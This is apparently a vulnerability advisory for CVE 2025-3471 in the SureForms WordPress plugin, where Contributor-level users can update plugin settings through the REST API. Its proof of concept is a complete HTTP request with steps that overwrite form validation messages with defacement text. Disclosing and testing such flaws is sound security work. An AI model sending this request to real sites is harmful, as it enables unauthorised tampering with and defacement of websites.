SureForms < 1.4.4 – Contributor+ Settings Update | CVE 2025-3471

Description

The plugin does not have proper authorisation check when updating its settings via the REST API, which could allow Contributor and above roles to perform such action

Proof of Concept

1) Install 1.4.3 version of this plugin
2) Login to your WordPress with Contributor User
3) Create new Request:
POST /index.php?rest_route=%2Fsureforms%2Fv1%2Fsrfm-global-settings&_locale=user HTTP/1.1

Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sureforms_form_settings&tab=validation-settings
content-type: application/json
X-WP-Nonce: NONCE_HERE
Cookie: CONTRIB_COOKIE_HERE
Origin: http://127.0.0.1
Content-Length: 1490
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


{"srfm_url_block_required_text":"HACKED","srfm_input_block_required_text":"This field is required.","srfm_input_block_unique_text":"Value needs to be unique.","srfm_address_block_required_text":"This field is required.","srfm_phone_block_required_text":"This field is required.","srfm_phone_block_unique_text":"Value needs to be unique.","srfm_number_block_required_text":"This field is required.","srfm_textarea_block_required_text":"This field is required.","srfm_multi_choice_block_required_text":"This field is required.","srfm_checkbox_block_required_text":"This field is required.","srfm_gdpr_block_required_text":"This field is required.","srfm_email_block_required_text":"This field is required.","srfm_email_block_unique_text":"Value needs to be unique.","srfm_dropdown_block_required_text":"This field is required.","srfm_valid_phone_number":"Please enter a valid phone number.","srfm_valid_url":"This site was hacked by someone.","srfm_confirm_email_same":"Confirmation email does not match.","srfm_valid_email":"Please enter a valid email address.","srfm_input_min_value":"Minimum value is %s","srfm_input_max_value":"Maximum value is %s","srfm_dropdown_min_selections":"Minimum %s selections are required","srfm_dropdown_max_selections":"Maximum %s selections are allowed","srfm_multi_choice_min_selections":"Minimum %s selections are required","srfm_multi_choice_max_selections":"Maximum %s selections are allowed","srfm_tab":"general-settings-dynamic-opt"}

4) Put in this Request Cookie of Contrib+ user, as well as the nonce from http://127.0.0.1/wp-admin/admin-ajax.php?action=rest-nonce
5) Send request and check settings from Admin.